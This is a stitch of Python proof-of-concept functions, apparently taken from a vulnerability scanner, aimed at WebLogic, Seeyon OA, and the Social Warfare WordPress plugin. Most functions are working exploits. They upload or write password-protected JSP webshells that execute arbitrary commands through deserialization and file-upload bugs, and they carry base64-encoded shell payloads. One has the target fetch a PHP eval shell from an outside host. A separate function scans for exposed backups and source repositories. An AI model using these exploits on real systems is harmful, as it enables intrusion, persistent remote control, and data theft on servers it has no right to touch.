def poc(url):
# 首先对url进行处理
# url = "http://www.example.org:7001/default.html?ct=32&op=92&item=98"
# --> http://www.example.org:7001
if url[:4] != "http":
url = "http://" + url
o = urlparse(url)
url = o.scheme + "://" + o.netloc
# 首先判断attack_url是否可访问
try:
attack_url = url + '/_async/AsyncResponseService'
r = request.get(url=attack_url,
headers=get_headers,
timeout=4,
verify=False)
if r.status_code != 200:
return []
except:
return []
# 因为不知道目标是linux还是windows,所以直接都检验一遍
# 如果存在漏洞,则将shell路径保存在webshell_path中
webshell_path = []
linux_check_1(url, webshell_path)
linux_check_2(url, webshell_path)
windows_check_1(url, webshell_path)
windows_check_2(url, webshell_path)
return webshell_path
def poc(url):
# url = "www.example.org/default.html?ct=32&op=92&item=98"
# --> http://www.example.org
if url[:4] != "http":
url = "http://" + url
o = urlparse(url)
url = o.scheme + "://" + o.netloc
headers = {
"User-Agent":get_random_ua()
}
# shell_name can modify it yourself
shell_name="config_db1.jsp"
shell_url = url + "/seeyon/" + shell_name
try:
# just prevent being attacked
res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
if res.status_code == 200 and ":-)" in res.text:
return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
except:
pass
shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
# def_shell content can modufy iy youself
def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
def_shell = def_shell.encode()
base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo="
payload_head_len = 283 + len(f_base64encode(shell_name))
payload_shell_len = len(def_shell)
payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
payload_shell_name = f_base64encode(shell_name)
payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66',
payload_shell_name), 'utf-8') + payload_shell
try:
request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
except:
return False
if ":-)" in res:
return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
else:
return False
def poc(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
vulnurl = url + payload
try:
req = request.get(vulnurl, headers=headers, timeout=10)
if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text:
return True
else:
return False
except:
return False
def poc(url):
# url = "http://www.example.org/default.html?ct=32&op=92&item=98"
# --> http://www.example.org
if url[:4] != "http":
url = "http://" + url
o = urlparse(url)
url = o.scheme + "://" + o.netloc + payload
try:
req = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False)
if req.status_code == 200:
return url
else:
return False
except:
return False
def bak_scan(url, payloads, result):
headers = {"User-Agent": get_random_ua()}
while not payloads.empty():
payload = payloads.get()
vulnurl = url + "/" + payload
try:
flag = 0
# 如果是备份文件则不需要下载,只需要head方法获取头部信息即可,否则文件较大会浪费大量的时间
if 'zip' in payload or 'rar' in payload or 'gz' in payload or 'sql' in payload:
req = request.head(vulnurl,
headers=headers,
timeout=5,
allow_redirects=False,
verify=False)
# 404页面 'Content-Type': 'application/octet-stream',
# zip 'application/x-zip-compressed' 'application/zip'
# rar 'application/octet-stream' 'application/x-rar-compressed'
# 采用Content-Type过滤,还是有一定误报
if req.status_code == 200:
if 'html' not in req.headers[
'Content-Type'] and 'image' not in req.headers[
'Content-Type']:
flag = 1
# 当检验git和svn、hg时则需要验证返回内容,get方法
else:
req = request.get(vulnurl,
headers=headers,
timeout=5,
verify=False,
allow_redirects=False)
if req.status_code == 200:
if 'svn' in payload:
if 'dir' in req.text and 'svn' in req.text:
flag = 1
elif 'git' in payload:
if 'repository' in req.text:
flag = 1
elif 'hg' in payload:
if 'hg' in req.text:
flag = 1
elif '/WEB-INF/web.xml' in payload:
if 'web-app' in req.text:
flag = 1
if flag == 1:
result.append(vulnurl)
except Exception as e:
# print(e)
continue
def linux_check_2(url, webshell_path):
linux_payload_2 = r"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>"""
try:
attack_url = url + '/_async/AsyncResponseService'
request.post(url=attack_url,
data=linux_payload_2,
headers=post_headers,
timeout=5,
verify=False)
jsp_path = url + '/bea_wls_internal/webshell2.jsp'
time.sleep(1)
r = request.get(url=jsp_path,
headers=get_headers,
timeout=5,
verify=False)
if r.status_code == 200:
webshell_path.append("{}?pwd=123&cmd=whoami".format(jsp_path))
else:
pass
# print("第二种方式失败")
except Exception as e:
pass
def poc(url):
#处理url
if url[:4] != "http":
url = "http://" + url
o = urlparse(url)
url = o.scheme + "://" + o.netloc
#判断是否可以访问
try:
attack_url = url + '/admin/index/login.html'
r = request.get(url=attack_url, headers=get_headers, timeout=4, verify=False)
if r.status_code != 200:
return []
except:
return []
#检查
attach_path=[]
fast_check_1(url,attach_path)
return attach_path
def poc(url):
# url = "http://www.example.org:8080/default.html?ct=32&op=92&item=98"
# --> http://www.example.org:8080
if url[:4] != "http":
url = "http://" + url
o = urlparse(url)
url = o.scheme + "://" + o.netloc
# 自定义的shell地址,内容为 <pre>eval($_REQUEST['z']);</pre>
shellpath = "http://saucer-man.com/aa.txt"
## TODO 需要多余服务的统一整合
# 执行的shell命令
shell = "phpinfo();"
vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format(
shellpath=shellpath, shell=shell)
try:
headers = {"User-Agent": get_random_ua()}
r = request.get(vulnurl,
headers=headers,
timeout=5,
verify=False,
allow_redirects=False)
if r.status_code == 200 and "PHP Version" in r.text:
return {
'payload':
vulnurl,
'post_data':
'',
'info':
'wordpress plugin Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)'
}
else:
return False
except:
return False